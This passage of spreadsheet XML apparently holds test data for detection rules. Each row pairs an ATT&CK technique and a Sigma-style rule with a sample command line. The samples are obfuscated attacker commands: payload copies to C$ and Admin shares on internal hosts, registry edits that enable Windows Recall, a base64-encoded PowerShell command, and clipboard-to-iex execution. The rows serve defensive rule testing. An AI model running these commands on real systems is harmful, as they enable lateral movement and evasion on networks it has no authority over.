          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="n"/>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B22" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C22" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D22" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="44" t="n"/>
      <c r="J22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="44" t="n"/>
      <c r="J23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B24" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C24" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D24" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B25" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C25" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D25" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="44" t="n"/>
      <c r="J25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B27" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C27" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D27" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E27" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F27" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="44" t="n"/>
      <c r="J28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="44" t="n"/>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E31" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="44" t="n"/>
      <c r="J31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E32" s="44" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="44" t="n"/>
      <c r="J32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B34" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C34" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D34" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E34" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E35" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="44" t="n"/>
      <c r="J36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E37" s="44" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E38" s="44" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="44" t="n"/>
      <c r="J38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B40" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C40" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D40" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E40" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="44" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E41" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32
eg.exe" add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI /v DisableAIData""Analysis /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="44" t="n"/>
      <c r="J41" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="44" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E42" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32
eg.exe" add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="44" t="n"/>
      <c r="J42" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K42" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="44" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B43" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C43" s="44" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D43" s="44" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E43" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\system32
eg.exe" del^ete HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI /v DisableAIDataAnalysis /f"</t>
        </is>
      </c>
      <c r="F43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="44" t="n"/>
      <c r="J43" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K43" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B44" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C44" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D44" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E44" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="44" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E45" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B46" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C46" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D46" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E46" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {echo Get-Process | clip
&amp; 'Get-Clipboard' | iex}</t>
        </is>
      </c>
      <c r="F46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="43" t="b">
        <v>0</v>
      </c>
